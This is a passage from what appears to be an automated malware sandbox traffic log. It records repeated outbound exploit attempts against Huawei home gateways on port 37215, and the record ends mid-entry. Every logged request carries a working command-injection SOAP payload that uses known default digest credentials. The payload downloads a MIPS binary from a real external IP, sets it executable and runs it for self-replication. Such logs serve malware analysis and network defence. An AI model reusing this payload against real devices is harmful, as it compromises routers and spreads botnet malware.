                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  345192.168.2.1360476157.141.93.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099781990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  346192.168.2.1350058197.232.200.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099797964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  347192.168.2.134621041.229.87.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099813938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  348192.168.2.134924641.49.99.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099813938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  349192.168.2.1335786197.79.172.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099828959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  350192.168.2.1337400157.28.135.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099838018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  351192.168.2.1352266157.201.140.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099859953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  352192.168.2.1334494197.141.190.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099862099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  353192.168.2.136049041.86.233.16337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099881887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  354192.168.2.1356328157.149.75.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.099899054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 